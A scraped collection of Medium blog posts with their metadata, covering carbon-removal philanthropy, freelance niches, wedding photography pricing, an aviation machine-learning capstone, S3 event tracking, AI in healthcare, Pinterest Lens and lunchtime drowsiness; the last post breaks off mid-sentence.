Our theory of change is rooted in our abilities and limitations. Philanthropy can support research (both into technical aspects and communications and messaging strategies), fund advocacy, policy development, and governance frameworks, and take on risks that governments or the private sector can’t or won’t. However, philanthropic resources are small relative to the many trillions in public and private capital that will ultimately need to be allocated toward climate solutions. Thus, any credible strategy from philanthropy should be focused on removing barriers and unlocking other forms of capital. The task ahead is daunting, and we are clear-eyed about what Paris-compatibility will entail — multiple simultaneous transformations in the ways that we produce, transport, and consume. Carbon removal is not a stand-alone task, but must be integrated into the larger economic and ecological systems they are deployed into. There are some carbon removal approaches that we know will have multiple benefits and can scale — these we should begin supporting through communications, policy development, advocacy, and investment. There are also many other approaches where it is too early to tell if they will be able to contribute to large-scale removal — but the urgency of the problem demands that we explore all options that hold the promise of arresting and reversing the climate crisis.
https://carbon180.medium.com/2050-priorities-for-climate-action-how-philanthropy-can-help-to-scale-carbon-removal-c0ac667361e6
[]
2019-06-05 20:13:10.407000+00:00
['Climate Change', 'Philanthropy', 'Future', 'Technology', 'Science']
To Find a Niche, Stop Looking
The niche issue would always leave people confused. The point of focusing on one theme for your content can be horrifying. How can you forget other topics or specialties and focus on one thing alone? Doesn’t it mean that you’re limiting yourself to fewer people? Doesn’t that mean less money? These are the questions that go through your mind when it comes to picking a niche, but as Pat Flynn says it best: There are riches in the niches. To charge more, you have to niche down. Nobody takes generalists seriously. You wouldn’t feel safe at a Doctor who can claim to know how to treat every part of your body — you would want to work with a specialist. The same thing goes with your clients. They wouldn’t like to work with a freelancer who claims to be an expert in everything because you cannot give your 100% to several things. I remember when I was writing the content for my website (it’s now live by the way), and I wanted to create content for the service page. Initially, I tried to include all the things I know how to do. I wanted to write — landing pages, emails, sales letters, sales brochure copies, ebook writing, SEO, and social media management services. In the agencies I work for, I do all of these, so I’m pretty experienced in them. But I wanted to include what I was best at and what came to me easily. Before now, I’ve had clients commend me on how well I use storytelling to make their blog posts and emails more engaging. I figured out that I easily come up with content for blogs and emails, but the others seemed more challenging (I still delivered good results though) I just included the two skills I was best at and used it as main service offerings — and I’ve been going on with them. I see it a lot on freelancing marketplaces how people include many skills on their profile. Although I can understand the mindset behind it is to attract a broader range of clients, but it shouldn’t be so because specialty is essential. You have to specialize in something to be able to charge premium fees. Everybody has that thing they do effortlessly, which other people will complain about how difficult it is. Writing is that thing for me. And within writing, there are sub-niches. I picked blog posts and emails as my specialty because I’m good at using stories to improve content engagement. I cringe when I write some technical pieces that don’t have any flair because it’s simply not me. I understand this, so naturally, I’d have to lean towards what I’m best at.
https://medium.com/change-your-mind/to-find-a-niche-stop-looking-f06c848478f2
['Tochukwu Okoro E.']
2020-06-26 11:47:11.899000+00:00
['Inspiration', 'Freelancing', 'Writing Tips', 'Creativity', 'Writing']
How Much Should a First Time Wedding Photographer Cost?
Last Updated: August 9th, 2019 The average price range we would expect a first time wedding photographer to charge for their services is between $0 — $1,000. Some photographers looking for their absolute first wedding experience may be willing to shoot for free in exchange for “exposure” and the ability to build their wedding photography portfolio. On the other hand, some photographers will deem their time worth something monetary, but will still want to offer highly discounted services to be competitive with other established photographers in the marketplace. There is no hard and fast rule on any of this. Our opinion is based on our own personal experience pricing our wedding photography services and seeing the starting rates that were charged by other photographers around the web and in our circle of friends. If you’re here just for the hard numbers, you have them already! If you want some more detail about why we feel a first time wedding photographer will fall in the $0 — $1,000 price range — we’re going to cover that in more detail now. The Photography Intern vs. the Photography Professional No matter what job a person is choosing to work, there will be some level of a learning curve. The best wedding photographers will normally have the opportunity to assist, shadow, and second shoot with other already established wedding photographers to get a taste of the work without having to fully invest themselves into the responsibilities of the job. We often think of starting photographers as the “interns” of the wedding industry in much the same way a person would intern to be a teacher, counselor, etc. While the idea of an “unpaid intern” seems to be getting less common (at least in the United States), it still remains one potential route. The idea here is that this intern is receiving compensation in the form of experience — and that may be sufficient compensation for some. This is just the simple fact — and while many photographers (and frankly — creatives working in virtually any industry) will object to the idea of “working for exposure”, we can at least understand the logic behind it. What working for “exposure” actually results in Okay — just because we can make sense of working for exposure, we don’t really agree with it in principal. This is especially true in the field of wedding photography — which is very high pressure and high stress at times. As an outsider looking in, it may seem easy enough — a person taking pictures of people getting married. In practice, though, there’s a lot more to it. The need for communication and designing effective logistics of the wedding day are all just a few things outside of “photography” we do. Some of the earliest shoots we did were for free and with exposure being an incentive. While growing our portfolio was beneficial, the exposure never really translated into anything tangible. We rarely would receive referrals of new business from these shoots. While we benefited from the hands on experience (and maybe for some this is enough!), that was about the extent of our benefit. Every wedding photographer, new or experienced, has to make the decision of what their time is worth. For those just starting out, working for free to get that little bit of experience may be okay, and that’s a fine decision if you go that route. For us — our time is valuable, and free is never an option anymore (save maybe for shooting photos through a charity like Now I Lay Me Down to Sleep). A wedding photographers’ job is not just 8 hours on a single wedding day. In practice, every booking we have results in at least 40–80 hours of work — an engagement shoot, wedding day shooting, photo editing, email communications, in person meetings, assembling a timeline, etc. Whether you are a photographer trying to figure out your pricing, or a prospective client looking to figure out how much you should be expecting to pay — we challenge you to keep this in mind. The wedding photographers you are looking at (or maybe comparing yourself too in some ways) are people too, and they probably put a ton more into their job then you realize. They should be paid accordingly — and they get to dictate their value. If that value is free for the first client — then fine, let them do it. If it’s $500 — then rad, let them do it. If they decide to take a giant leap and maybe already have a lot of photography experience in other niches, then by all means they can jump in at a higher price point. But make no mistake about it: exposure doesn’t = compensation. Rarely does the promise of exposure pay off. Money = Real Compensation The defining feature of a professional wedding photographer is they will charge money (any amount) for their services. As we started to charge to shoot weddings and other sessions, we began to approach things as a business instead of someone just dabbling in what is virtually a new hobby. The money we made we invested again and again into new camera gear, professional services to make our workflows better and give our clients better experiences, and over time — allow us to do things with money on a personal level like travel more. We think it’s entirely reasonable if a person is just starting in in this industry to get their feet wet with little or no financial incentive, but that is not a sustainable way of living. Our efforts have value — even if they are ultimately artistic pursuits. If you’re a newbie wedding photographer, consider charging even $50 for your first wedding. If you don’t have the photography portfolio established, at least make people value your time and efforts. If you’re a potential client looking for a wedding photographer on the cheap, be willing to spend at least a little bit of money on someone who will be present and documenting one of the most important days of your life. If the photographer is against charging you, considering dropping them a tip at the end of the night as a way of saying thanks for their time. 3 Benefits of Hiring a First Time Wedding Photographer 1). Lower costs for clients on a budget. For people looking to hire a wedding photographer without a lot of extra spending money, those photographers just starting out are going to be a good match. While they won’t have the level of experience of portfolio to support them, they can still be great to work with and capture the day. When we got married back in 2016, we were on a tight budget for our wedding. While wedding photography was important for us — at the time, affording a $5,000 photographer wasn’t in the cards as we struggled to even keep our rented house heated — even if we love and respect the work of the people we saw. We ended up finding a great photographer who was starting out, had a rocking time, love our photos, and still stay connected as we’ve had the opportunity to see her grow her wedding photo business. Related: 2). Creating opportunities for the photographer. The photography industry is filled with a lot of people available to take on work. Often, the hardest part is getting the first gig or two. As a client, giving someone a chance to make their dreams come true is a huge deal. Obviously, you will want to be sure you click with the person and they seem like they can come through (within reason) on what you are wanting — but this is a great side effect. 3). They will bring an unrestricted point of view to your wedding. It’s easy for wedding photographers who have done dozens (or hundreds) of weddings to get into a simple mindset of doing the same things over and over. Don’t get us wrong — there is definitely value to that sort of approach in some situations, but it can just as easy turn into cynicism and a bad case of “honing it in” just to get some shots done. Beginner photographers will often be a lot more unhinged. They’re more excited to take great photos, and have a really great time doing it since it won’t feel like work just yet. Photographing one wedding is a lot different than photographing your 60th — we can tell you that! 3 Downsides of Hiring a First Time Wedding Photographer 1). They lack experience. After the wedding day is over, it’s really easy to tell the good wedding photographers from the bad ones. As we’ve pointed out, not all beginner photographers will be bad — but we can say they will lack the experience that is sometimes necessary to navigate wedding days successfully. You might be thinking — weddings aren’t that hard!! Sure — some of them are not. But others throw curveballs with schedules being thrown off, family & friends of the B&G stirring up drama, and so on. A photographer with a lot of wedding experience will be able to better adapt and get the shots that are needed. More than this — they will be able to predict these types of things as well. 2). They lack organization. We look back at our earliest weddings and realize — “wow, we were pretty disorganized!” We struggled with figuring out the flow of the day, communicating effectively with clients, and even just finding our way around wedding venues. Since then, our approach has become much more refined and, well, professional. Now we start to get organized before many of our clients even book with us. We get all the info we need upfront. We send out a wedding questionnaire about a month in advance and put together a timeline to help our clients get on the same page as us for the flow of their day. Little things like these go a long way to creating organization pro-actively. 3). They won’t have the best gear to back them up. The honest truth is, budget photographers will be photographing on budget gear. We mentioned in this post that we shot our first weddings on a Canon Rebel camera — a good beginner camera, but not really one that is up to the task of making professional images in any consistent fashion. The (obvious) reason for this is because professional camera gear costs money. If a wedding photographer isn’t being paid enough to afford this type of equipment, how can they take really great photos? Because the actual costs can often feel intangible, we can tell you we’ve spent over $30,000 on camera gear to help us support the creation of high quality and beautiful images in any environment. Budget gear can work when conditions are right, but once you enter a low light or imperfect lighting environment, it becomes harder and harder to get good images. If anything is true about wedding photography, it’s that consistency should be one of the goals. If you’re an aspiring wedding photographer and need help getting the right camera, lenses, etc. — check out our Recommended Gear pages right now! Your Thoughts? So — what do you think? Is the price range of $0 — $1,000 reasonable in your mind for a first time wedding photographer? Why or why not? We’d like to hear your thoughts and let this run into a good discussion on the topic. We know that many people have opinions including established photographers, prospective clients trying to figure out what is a normal rate to be paying, and the first time photographers themselves! Let us know which camp you fall into, too!
https://medium.com/swlh/how-much-should-a-first-time-wedding-photographer-cost-7f9ecb67706d
['Chris Romans']
2019-08-09 22:41:18.156000+00:00
['Freelancing', 'Business', 'Photography', 'Startup', 'Entrepreneurship']
Combining Data Science and Machine Learning with the Aviation Industry: A Personal Journey through a Capstone Project (Part II)
As a result of these initial scores, Figure 7 and Figure 8 above have been created to analyze the residuals within our model for training and testing. Each figure tells us that our model was appropriately chosen as the residuals do not show any clear patterns and also decently reveal an even spread of points above and below the horizontal red line. The horizontal red line represents the idealized regression of our model while the scattered points represent the difference in value of each consecutive prediction and label. Discovering a pattern in the residuals with our own eyes would indicate that we can use a better model to describe the system — logically, if you recognize a pattern in your errors, then that means you should recognize that there is a way to reduce that error by incorporating such pattern into your model. If all the residuals in both graphs showed uneven spread — where a significant amount of points exist in one threshold separated by the horizontal line over the other, or where residual show a pattern of slowly spreading out further and further from the horizontal line — it means your model could still be tweaked to account for evening out the residuals. Conclusions, Study Summary, and Thanks… It’s safe to start with stating that the study showed signs of a moderate success. From a variety of constraints — such as limited air travel in the new regime change, problems integrating API data together, unbalanced data, time constraints, data access restraints, and more — we were able to come out with a “proof-of-concept” study to show how a machine learning model can be used to predict the minimum cost threshold of airline tickets in this new regime. On the contrary, it is still appropriate to mention that the limitations of our model can make this attempt pointless in a business perspective due to how niche the study had become, where some corners had to be cut, and how practical/reliable the models will be. However, almost all models will face general limitations due to niche barriers, which leaves us hopeful to say that our model is just like any other models used to predict the same label (it can only get better). Through this study, a lot was covered, and it may be difficult now to fully gather together what was taken from both of the articles written here. To summarize, we as data scientists were approached by a business to answer the question, “What is the minimum cost threshold an airliner can charge their passengers per flight and how can we make a model that discovers this?” We were given a month time to have a working proof of concept. We achieved these goals, to some degree. Through the process, we learned about regime change and how the Covid-19 pandemic has played an instrumental role in our data collection phase. We learned about the limitations of using different APIs and what sort of cleaning must be done for data. We discussed how we can overcome data domain issues and create data out of our collection methods by using unique ways to increase data and add diversity to it. We learned about bootstrapping to expand our data and machine learning methods such as Linear regression, cross validation, KNN regression, and Decision Tree regression. We learned about ensemble machine learning such as Bagging regression and Random Forest and simultaneously discussed the data imbalance occurring from the trends we uncovered. We ultimately created a model with cross validated mean absolute error of $173 — all done without heavy hyperparameter tuning. To me, this capstone project served as a very personal journey to prove myself in the world of data. I wanted to use what I knew about the aerospace industry and combine it with data analytics to ultimately showcase a project worth investing more time and resources into. With a more stable regime, more access to data, and more time, this project has the capability to scale to help a real-world business. Writing this series has been a joy as I wanted to really express what I know to the world and also help someone learn from the study. Machine learning is a popular field to talk about, but it is often hard to find real-world practical implementations models. Many times, machine learning is left back with research as its uses for studies become too personalized around a specific problem. Ultimately I want the people, who took their precious time from their day to read this article, to come out of this series learning something new and thinking on ways to better analyze data and to apply machine learning to societal problems. I greatly appreciate your time and give my sincerest thanks. Do not stop teaching yourself and do push on to bigger and better things while you still can in this world; cherish what you learn as you go on. Cheers! BONUS: Learning How Thermodynamics can be Used to Predict Pricing My background is in engineering and I did as best as I could to reflect that here, but I know there is more which could have been done to better integrate engineering concepts into the study. In truth, this capstone project was initially inspired by a project I had done in my undergraduate studies with Hofstra University. One of my final design projects was meant for my Thermal Engineering course, which is the field that studies thermodynamic principles on machines. In this senior design project, I analyzed a trans-Atlantic flight I flew on earlier that year and collected data regarding that flight’s speed and altitude from FlightAware.com. At the time, it was much easier to get this data ported into an Excel spreadsheet, without the need for scraping — and this was before I knew how to use Python, how to web scrape, or how to play with APIs. From this data alone, along with some idealized assumptions, I was able to successfully perform a comprehensive idealized jet propulsion engine analysis on the plane’s engines and determine many important properties of the air traveling through the turbofans. I wanted to include this section as a bonus for one to ponder on when thinking about this study, as it is the “lost link” still wished to be integrated into the project, but could not have been implemented due to the FlightXML API constraints in the study and the lack of flight data due to Covid-19. Instead, I will give a walkthrough description of the project performed back in my undergraduate course in 2018, as an example to show what extra data could have been generated to potentially help better our model. On October 17th, 2018 I flew on flight BA115 (British Airways flight 115) to travel from London Heathrow Airport to JFK International Airport. The goal of such previous project was to perform and analysis on the thermodynamic cycle states of the engines. FlightAware.com was used primarily to access accurate speed and altitude measurements of the individual flight, as the plane logged such information over time to nearby radio checkpoints along the route. From FlightAware.com, it was also discovered that the plane flown was a B747–400, which is a quad-jet aircraft and is a variant of the B747 series — notoriously considered the most notable aircraft design in all of history of human flight. Above are two images of the October 17th flight flown in 2018. Unfortunately, it is not possible to access the graphic above from FlightAware.com anymore as basic access users only have access to 3 months of data history. As a result, take the referenced source for the above graphics with appropriate consideration that it may not be reflecting the same exact path described in the study, but is similar enough for our intended purposes. From FlightAware.com, I was able to retrieve 660 data points of speed, altitude, direction, time, and more of flight BA115. From this data, it was determined that the flight time lasted eight hours and fifteen minutes (29,700 seconds equivalent) and the total distance flown was 5,922.386 kilometers. The weather of that particular day showed clear skies throughout the entirety of the flight, eliminating the need for massive environmental constraints. Ideal Jet Propulsion Cycle referenced from (Cengal Y.A. & Boles M.A., 2002. Thermodynamics: An Engineering Approach. McGraw-Hill Companies Inc. New York, NY. 483–487) In analyzing thermodynamic machines, graphics such as the one above are used to understand the different property states occurring through the machine’s life cycle. The one above showcases the relationship between entropy and temperature within the jet engine’s idealized lifecycle. Entropy (commonly defined as the variable “S” in theoretical thermodynamics…unlike our graphic denoting a lowercase “s” for “specific entropy” on the horizontal axis) is a measure of “how much energy is not available to do work in a system”. It is often closely associated with chaos or a measure of how a system becomes more disordered over time. The units of entropy are measured in Joules/Kelvin. Engineers, must understand what entropy is, but will more often use specific entropy in their analysis where its units are measured as kiloJoules/(kilograms*Kelvin) or more easily defined as entropy per mass. Specific entropy is often used to analyze a certain form of mass existing within a system, hence the inclusion kilogram units in the denominator. Specific entropy can change dependent on different states within a system — often for water, empirical steam tables are referenced to analyze the specific entropy of water to provide a better understanding of a system. For our case, we will be analyzing air, where such tables are not readily needed. Reverting back to our diagram above, the T-s diagram (Temperature vs entropy diagram) indicates how energy of air within the plane’s engine is analyzed during its lifecycle with pressure held constant across some processes. In entropy states one through three, pressure is increased through isentropic compression. Here, air travels first from the engine’s inlet, through the diffuser and then through the compressor. In process three to four, the air then travels through a burner/combustion chamber from the compressor. The air itself is heated up at constant pressure, resulting in higher entropic value, which simultaneously increases the heat transfer per unit mass (denoted as the variable “q”). The air currently is prone to a higher energy release. In process four through six, the air undergoes isentropic expansion where pressure is released in the journey from the combustion chamber, through the turbine, and through the nozzle exit. Such pressure release ultimately thrusts the aircraft forward with immense force, constantly. Ideal Jet Propulsion Cycle referenced from (Cengal Y.A. & Boles M.A., 2002. Thermodynamics: An Engineering Approach. McGraw-Hill Companies Inc. New York, NY. 483–487) Throughout the study, several different assumptions and underlying initial conditions need to be addressed for its analysis. First, it was important to treat air as an ideal gas, meaning that air properties will behave normal to standard temperatures and pressures. From Appendix A.1 in the fourth edition of Engineering Thermodynamics by M. David Burghardt and by James A. Harbach, the specific heat of air constant pressure used in the study was 1.005 kiloJoules/(kilograms*Kelvin) and the Boltzmann constant used was 1.4. Both of such numbers will be important for our mathematical formulas used in learning about engine properties. Specific heat is a measure of how much energy must be added to a property to raise its temperature. Specific heat can change depending on surrounding factors, which is why it is important to denote what is held constant in such factors when relying on the ideal gas law (which is why we assumed air to be idealistic in our analysis). Specific heat can be affected by changing volumetric and pressure values which is why we only analyze such measures for ideal purposes by holding one of the independent variables constant. In our case, our engine will undergo a constant pressure process, which is why we will use the specific heat number for constant pressure for air as is the deterministic nature of the study. The Boltzmann constant is a number measuring the proportion of a property’s energy to thermodynamic temperature. The operating conditions of the engine were assumed to be steady state, which means that system state variables were to remain constant. Self-made whiteboard image. The plane was theoretically assumed to be a stationary object where recorded speed of the aircraft was factored as the air free-stream velocity (denoted as “v­­” subscript “∞”) to equal/represent the velocity of the aircraft (denoted as “v” subscript “aircraft”). Such assumptions allows us to state that the free-stream velocity can act as each jet engine intake. Furthermore, the kinetic and potential energy in the system were negligible except at the inlet and exit conditions, plus the atmospheric temperature, pressure, and air density were to be averaged values between zero and 15,000 meters altitude. From the UK Civil Aviation Authority Engine Type Certification Data Sheet №1048, it was uncovered that four Rolls Royce RB211–524H jet engines are typically used on a B747–400. For this study, only one engine will be analyzed and such findings from the individual engine analysis will be assumed across all four jets mounted on the airplane. A uniform diameter is assumed for the jet shaft with a length of 2.19 meters. The turbine work was assumed to be equal to the compressor work. The velocity of the air leaving the diffuser was assumed to be equal to zero meters per second. The thrust generated from bypassing air was to be neglected. The combustion chamber temperature was assumed to be 2,273 degrees Kelvin. The compression ratio, the ratio of total volume to clearance volume in a piston, was found to be 32.9:1. Generalized Analysis: Where Thermodynamics could have Merged with Machine Learning With all such assumptions and initial conditions factored in, the below follows the mathematical analysis performed to analyze the ideal jet propulsion cycle. All of such analysis is stemming off the concepts learned from my undergraduate studies and following the teachings of Dr. Burghardt himself, who wrote the heavily used textbook mentioned earlier as Engineering Thermodynamics. Through such analysis, we will primarily observe engine states by remarking a measure known as enthalpy, or enthalpy per unit mass for our system. Enthalpy is a measure of energy transfer between a system and its surroundings. Throughout our analysis, understanding this enthalpy will help us uncover all of the property states needed to tell us more about what is going on with our engine. This is where the magic occurs, in my opinion. In a rather elegant way, we scientists have the ability to know what is going on at every stage of our engine by simply measuring how much energy is moving within the engine — and we don’t even have to physically be on the airplane to do this. It was my intention to use such analysis to perform very comprehensive EDA for our initial machine learning study and include an analysis for the different engines present for different planes found out in our study — ultimately building a highly accurate tool able to give a better cost estimate of the journey analyzed. From such known data, we could find a way to factor important features such as measured average air temperature/pressure states, measured engine efficiency, measured thrust output, and measured propulsive thrust power. Expanding further on this could allow us to analyze air-fuel ratios, changing fuel mass over time on a flight, and maybe help us know how passenger payload can play a role in savings. To start before observing some MATLAB generated plots on these dependent variables, we will first go over the generalized analysis taken. Self-created LaTeX.
https://medium.com/analytics-vidhya/combining-data-science-and-machine-learning-with-the-aviation-industry-a-personal-journey-through-f063895fbd47
['Christopher Kuzemka']
2020-11-05 17:53:54.124000+00:00
['Data', 'Machine Learning', 'Aviation', 'Engineering', 'Python']
How to Track Unprocessed Objects in S3
Solution with SQS Introduce an SQS queue to the setup. I’ll call this queue raw-data-object-creation-event-queue . A message event will be sent to this queue whenever a new object is created in the raw-data bucket. To accomplish this, set up an event listener at raw-data bucket and listen for All object create events happening. In case an object is created (ie. uploaded at this bucket), send a notification event at the SQS queue created.
https://towardsdatascience.com/how-to-track-unprocessed-objects-in-s3-5a7d3b32352d
['Dardan Xhymshiti']
2020-07-07 23:43:33.532000+00:00
['AWS', 'Programming', 'Data Sceince', 'Data Engineering']
AI in healthcare: keeping data safe and building trust
Our approach to healthcare is changing rapidly, thanks to the Internet of Things (IoT), which continues to drive the demand for services offering more intelligent analytics. As machine learning advances, there is also a broadening applicability of AI. In an increasingly digitized world of connected devices and intelligent systems, international standards play a key role in addressing the ethical, technical, safety and security aspects of the technologies we encounter in daily life. Work is already underway in a joint committee for AI established by IEC and ISO. This is the first of its kind to consider the entire AI ecosystem rather than focusing on individual technical aspects. Headed by Wael Diab, a senior director at Huawei, it draws on the breadth of application areas covered in IEC and ISO, with IT and domain experts coming from different sectors. “Connected products and services such as medical devices and automated healthcare systems must be safe and secure or no one will want to use them. Trustworthiness and related areas such as resiliency, reliability, accuracy, explainability, safety, security and privacy must be considered from a systems perspective from the get-go. Standardization will need to adopt a broad approach to cover the AI technologies and consider synergies with analytics, big data, IoT and more”, says Diab. An apple a day keeps the algorithm away From robotically-assisted surgery, virtual nursing assistants, dosage error reduction and connected devices to image analysis and clinical trials, AI technologies already play many different roles in the delivery of healthcare treatments, surgeries and services. They include improving diagnostics and helping doctors make better decisions for patients. Health insurance is a critical part of the industry and is also making use of AI. For example, some software platforms use machine learning to identify and reduce inefficiencies in the claims management process such as fraudulent inaccurate billing or waste through under-utilization of services. Others help patients choose tailored insurance coverage to reduce healthcare costs and assist employers looking for group coverage options. Digitizing healthcare The personal data of millions of patients worldwide is being gathered, stored and shared electronically in healthcare management delivery systems, clinical research and medical consultations. Doctors and researchers alone can’t leverage all this information to enhance patient care, but in a growing number of trials, algorithms have successfully mined huge numbers of patient files and medical images in a timely manner, with the result that diverse conditions are detected and diagnosed. Examples include certain cancers, the risk of heart disease and eye-related conditions. AI-powered imaging technology has learned to read thousands of anonymized complex eye scans and detected more than 50 eye conditions successfully. With an accuracy level of 94%, the algorithms matched or beat the performance of world-leading eye specialists. The argument is that this technique of sifting through big data rapidly could help reduce the time taken for patients to be seen by a consultant, and possibly save a person’s sight, but there are many hurdles to overcome before trials are fully approved. How safe is AI in the medical context? What happens if we are not in the 94% accuracy group? What if the algorithm developers get it wrong and create biases which impact patients negatively? While it has been acknowledged that technology has the potential for improving patient care greatly, thereby saving costs, some physicians and scientists are warning the AI community to get their ethics right first. In the healthcare context, errors could potentially harm or be fatal. If this doesn’t happen, we run the risk of introducing automated systems into the mix in a blind fashion. If errors occur, who will be accountable: machines or healthcare professionals? Recent research by Stanford University, published in the New England Journal of Medicine, raises a number of key issues which need to be addressed thoroughly before rolling out AI into healthcare. They include: Ensuring that data bias in algorithms doesn’t skew results Making sure physicians have an adequate understanding of how algorithms are developed and don’t over-rely on them Maintaining regard for clinical experience, so that the human aspect of patient care is not lost Maintaining confidentiality as the dynamics of doctor-patient relationships change Find out more by reading the article Eliminating bias from algorithms in this issue. Looking ahead Disruptive technologies like artificial intelligence pose both challenges and opportunities across all sectors. AI has already changed many aspects of daily life and will continue to have a massive impact on the lives of people and on entire societies. The important task of ironing out the many ethical questions already raised is vital to the successful adoption of these innovative technologies. IEC also contributes towards this effort as a founding member of the Open Community for Ethics in Autonomous and Intelligent Systems (OCEANIS). This community provides a space for interested organizations from around the world to share information and collaborate on initiatives and programmes, while enhancing the understanding of the role of standards in facilitating innovation. “Consensus-based international standards will play a crucial role in accelerating adoption of AI technology in industry application verticals,” says Diab. “End user societal concerns, ethical and trustworthiness considerations are being discussed and incorporated from the ground up.”
https://medium.com/e-tech/how-safe-is-ai-in-healthcare-81bd678e6f8f
[]
2019-02-06 09:29:54.296000+00:00
['Health Data', 'Health', 'Artificial Intelligence', 'Healthcare', 'Ethics']
Building Pinterest Lens: a real world visual discovery system
Andrew Zhai | Pinterest tech lead, Visual Search Recently, we announced Lens BETA, a new way to discover objects and ideas from the world around on you using your phone’s camera. Just tap the Lens icon in the Pinterest app, point it at anything and Lens will return visually similar objects, related ideas or the object in completed projects or contexts. Lens enables you to go beyond traditional uses of your phone’s camera–taking selfies or saving a scene–and turns it into a powerful discovery system. It brings the magic of Pinterest into the real world, so that anything you see can lead to a related idea on Pinterest. Here we’ll share how we built Lens and the main technical challenges we overcame. Background In 2015, we launched our first visual search experience which enables people to pinpoint parts of an image and get visually similar results. With visual search, we gained a platform to advance our technology and incrementally improve the system by optimizing for not only relevant results but engaging ones, too. Pinners have responded positively to these improvements and now generate more than 250 million unique visual searches every month. As the next evolution of visual search, we introduced real-time object detection. This not only made visual search easier to use, but we also steadily gained a corpus of objects as people saved and selected them. Since its launch, we’ve generated billions of objects in just six month’s time, and have used this data to build new technologies, such as Lens and object search. If you’re interested in a more in-depth look at how we scaled our visual search technology to billions of images and applied it across Pinterest, please take a look at our Visual Discovery at Pinterest paper that was accepted for publication at World Wide Web (WWW) conference this year. Lens architecture A single Pin can take you down a rabbit hole of related ideas, enabling you to discover high quality content from 150M people around the world. As we developed Lens, we wanted to parallel this experience, so a single real world camera image could connect you to the 100B ideas on Pinterest. Lens combines our understanding of images and objects with our discovery technologies to offer Pinners a diverse set of results. For example, if you take a picture of a blueberry, Lens doesn’t just return blueberries: it also gives you more results such as recipes for blueberry scones and smoothies, beauty ideas like detox scrubs or tips for growing your own blueberry bush. To do this, Lens’ overall architecture is separated into two logical components. The first component is our query understanding layer where we derive information regarding the given input image. Here we compute visual features such as detecting objects, computing salient colors and detecting lighting and image quality conditions. Using the visual features, we also compute semantic features such as annotations and category. The second component is our blender, as the results Lens returns come from multiple sources. We use our visual search technology to return visually similar results, object search technology to return scenes or projects with visually similar objects (more on this below) and image search which uses the derived annotations to return personalized text search results that are semantically (not visually) relevant to the input image. It’s the job of the blender to dynamically change blending ratios and result sources based on the information derived in the query understanding layer. For instance, image search won’t be triggered if our annotations are low confidence, and object search won’t be triggered if no relevant objects are detected. As shown above, Lens results aren’t strictly visually similar, they come from multiple sources, some of which are only semantically relevant to the input image. By giving Pinners results beyond visually similar, Lens is a new type of visual discovery tool that bridges real world camera images to the Pinterest taste graph. Building object search Sometimes you see something you love, like a cool clock or a pair of sneakers, but you don’t know how to style the shoe or how the clock would look in a room. Object Search, a core component of Lens, is a new technology we built to address these problems. With the advances of deep learning resulting in technology such as improved image representations and object detection, we can now understand images like never before. Traditionally, visual search systems have treated whole images as the unit. These systems index global image representations to return images similar holistically to the given input image. With better image representations as a result of advancements in deep learning, visual search systems have reached an unprecedented level of accuracy. However, we wanted to push the bounds of visual search technology to go beyond the whole image as the unit. By utilizing our corpus of billions of objects, combined with our real-time object detector, we can understand images on a more fine grained level. Now, for the first time, we know both the location and the semantic meaning of billions of objects in our image corpus. Object search is a visual search system that treats objects as the unit. Given an input image, we find the most visually similar objects in billions of images in a fraction of a second, map those objects to the original image and return scenes containing the similar objects. Future of visual discovery The BETA launch of Lens is really just the beginning. We’re continuing to improve our visual technologies to better understand images, as we face challenges where the image is the only available signal that we have to understand user intent. This is especially difficult in the case of real world camera images as people take photos in a variety of lighting conditions with inconsistent image quality and various orientations. We’re excited by the possibilities that objects and visual search together can bring and are continuing to explore new ways of utilizing our massive scale of objects and images to build discovery products for Pinners around the world. If you’re interested in tackling these computer vision challenges and building awesome products for Pinners, please join us! Acknowledgements: Lens is a collaborative effort at Pinterest. We’d like to thank Maesen Churchill, Jeff Donahue, Shirley Du, Jamie Favazza, Michael Feng, Naveen Gavini, Jack Hsu, Yiming Jen, Jason Jia, Eric Kim, Dmitry Kislyuk, Vishwa Patel, Albert Pereta, Steven Ramkumar, Eric Sung, Eric Tzeng, Kelei Xu, Mao Ye, Zhefei Yu, Cindy Zhang, and Zhiyuan Zhang for the collaboration on the product launch, Trevor Darrell for his advisement, Yushi (Kevin) Jing, Vanja Josifovski and Evan Sharp for their support.
https://medium.com/pinterest-engineering/building-pinterest-lens-a-real-world-visual-discovery-system-59812d8cbfbc
['Pinterest Engineering']
2017-02-22 18:35:32.806000+00:00
['Deep Learning', 'Machine Learning', 'Visual Search', 'Computer Vision', 'Engineering']
How To Hack Your Lunch
Like most people I know, lunch is my favourite meal of the day. It’s usually our first big meal of the day, and one that we’re always looking forward to, especially after an energy-draining first half of the day. Naturally I gravitated towards heavy lunches. The things in my lunch menu included creamy spaghetti, double cheeseburgers, and the occasional pad thai on the more adventurous days. I liked to keep my lunch meals variegated, but one thing struck a common thread. No matter what I had for lunch, I’d always feel lethargic and drowsy afterwards. For me, this lead to a downward spiral in post-lunch productivity, which was quite annoying. Fortunately for me, I came across an article by the New York Times not so long ago that demystified this vexing phenomenon. For one, it is a natural human tendency to feel sleepy around lunch hours. Our Circadian rhythm is engineered to undergo a dip about 7 hours into waking up. This particular process is embedded within the deep recesses of our primitive brain and is therefore very difficult to suppress. One way to mitigate this problem is by maintaining a good sleep-wake schedule and to get adequate rest during the night. The second reason heavy lunches make people feel drowsy goes down to our body’s physiological processes following meals. After a particularly heavy meal, our blood flow diverts from the brain and into the gut as our body’s parasympathetic nervous system kicks into ‘rest and digest’ mode. This diversion in blood flow is responsible for making us feel a downslope in alertness, productive output and a blunted creative tendency. This same process, in reverse, causes blood to divert from the gut and into the muscles and brain when one is exposed to a threatening stimulus, which triggers the ‘fight or flight’ response. This is carried out by the sympathetic nervous system. Your muscles go into full alert mode, putting whatever process is currently undertaking in your digestive tract on hold. The entire process is regulated by the autonomic nervous system in the brain and spinal cord, and is particularly useful when it comes to prioritising tasks in your body. Because it’s practically impossible for parasympathetic and sympathetic activities to occur simultaneously, this system acts like a sorting machine to ensure the right task is performed during the right circumstances. Unlike the fully autopilot nature of our Circadian rhythm, we at least get to control what enters our digestive system. By the mere virtue of quantity, a heavier meal will cause an increased parasympathetic response, and hence worsen an already present propensity to slump on your chair during the afternoon hours. A lighter meal, in contrast, lessens our digestive burden and therefore dampens the effects of parasympathetic overload. In return, they have the potential to improve post-prandial productivity and reduce daytime sleepiness. I experienced the benefits that lighter meals proffered first hand and found that switching my lunch regimen to a simpler, calorie-lighter diet made me less drowsy in the afternoon, and vastly improved my post-lunch energy levels. Nowadays, I opt for a small pasta with some grilled chicken shreds or a simple green pea-and-chicken salad and a glass of water. I no longer need my ration of coffee in the 